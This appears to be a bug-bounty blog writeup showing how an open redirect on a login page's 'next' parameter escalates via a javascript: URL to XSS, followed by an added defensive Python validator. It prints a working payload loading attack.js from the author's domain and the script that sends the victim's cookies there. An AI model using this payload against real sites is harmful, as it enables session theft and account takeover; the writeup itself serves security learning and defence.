Open-redirect to Account Takeover.

Rishabh
2 min read · May 19, 2019


We will lead to here later.

Hi everyone, this is my first writeup about my first bug, and I want to share how I escalated an open redirect to account takeover. Let's go.

https://victim.com/login/?next=/page/

This was the URL that redirects to the given page after login. The issue was that if I passed https://google.com to the next parameter, it redirected to google.com, which is an external domain.

After reading more than 15 reports about open redirects, I learned that what you can do with this vulnerability is redirect the user to your own domain and then prompt for sensitive information. The manipulated URL looks something like this:

https://victim.com/login/?next=https://your_domain.com

But I did not report it that way. Instead I tried something else: a different scheme (javascript:). Luckily there were no filters for that, so the vulnerability escalated from a phishing attack to XSS. After that I made a PoC that steals the cookies of the user who opens the manipulated URL.
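As an added, defensive counterpart (not part of the original writeup, and not the vulnerable site's code): a Python validator for a next parameter that accepts only same-origin absolute paths. It rejects both the external https://google.com redirect and the javascript: scheme described above, and also the scheme-relative and backslash variants browsers accept. The function names and the sample values are my own; the rejection reason is returned so it can be logged for detection.

```python
import re
from urllib.parse import urlparse

# ASCII control characters; browsers strip some of these inside a URL,
# which lets "java\tscript:" become "javascript:" after the check runs.
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")


def classify_next(value):
    """Return ("ok", path) for a safe same-origin path, else ("reject", reason)."""
    if not value:
        return ("reject", "empty")
    candidate = value.strip()
    if CONTROL_RE.search(candidate):
        return ("reject", "control-chars")
    # Browsers treat a backslash like a slash in the authority position,
    # so "/\evil.example" is really "//evil.example".
    candidate = candidate.replace("\\", "/")
    parsed = urlparse(candidate)
    if parsed.scheme:
        # Any scheme at all (https:, javascript:, data:, ...) means this is
        # not a relative path on our own origin.
        return ("reject", "scheme:" + parsed.scheme)
    if parsed.netloc or candidate.startswith("//"):
        return ("reject", "external-host")
    if not candidate.startswith("/"):
        return ("reject", "not-absolute-path")
    return ("ok", candidate)


def safe_next(value, default="/"):
    """Value to put in the Location header after login: the validated path or a default."""
    verdict, detail = classify_next(value)
    return detail if verdict == "ok" else default


if __name__ == "__main__":
    # Constructed sample inputs, including the two payload shapes from the writeup.
    for sample in ["/page/", "https://google.com", "//evil.example",
                   "javascript:$.getScript`https://my_own_domain/attack.js`"]:
        print(repr(sample), "->", classify_next(sample))
```

Allow-listing a relative path is simpler and safer than trying to deny-list schemes; a deny-list would have had to anticipate javascript:, data:, and every encoding trick, whereas requiring a single leading slash and no scheme or host handles all of them.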

Problems I faced while making the PoC.

  1. Double quotes, single quotes, and parentheses were not allowed. [I used the backtick (`)]
  2. To steal cookies you need to make a request to your server carrying the cookies, but you can't use fetch or XMLHttpRequest because both require parentheses. [After a day of searching I found that the website uses jQuery, so I loaded my own JavaScript into their origin, which allowed me to do anything]:

?next= javascript:$.getScript`https://my_own_domain/attack.js`

Attack.js

// Runs on the attacker's own page: read the cookie from the query string and show it.
if (location.host == "my_own_domain") {
  var url = new URL(document.location);
  var parameters = new URLSearchParams(url.search);
  var cookie = parameters.get("cookie");
  document.write(cookie);
}
// Runs on the vulnerable origin (loaded via $.getScript): send document.cookie to the attacker's page.
else {
  var cookie = document.cookie;
  document.location = "https://my_own_domain/attacker.html?cookie=" + cookie;
}

Takeaways

  1. Always try something different. I even tried for XSS directly (?next=<script>alert(1)</script>). Sometimes it works out and sometimes it does not, but in both cases you gain experience and familiarity with the concept.
  2. It may take you time to find your first bug, but the experience is worth it.

Final Payload

https://victim.com/?next= javascript:$.getScript`https://my_own_domain/attack.js`

My twitter ==> ME

Thanks a lot for reading. Until next time
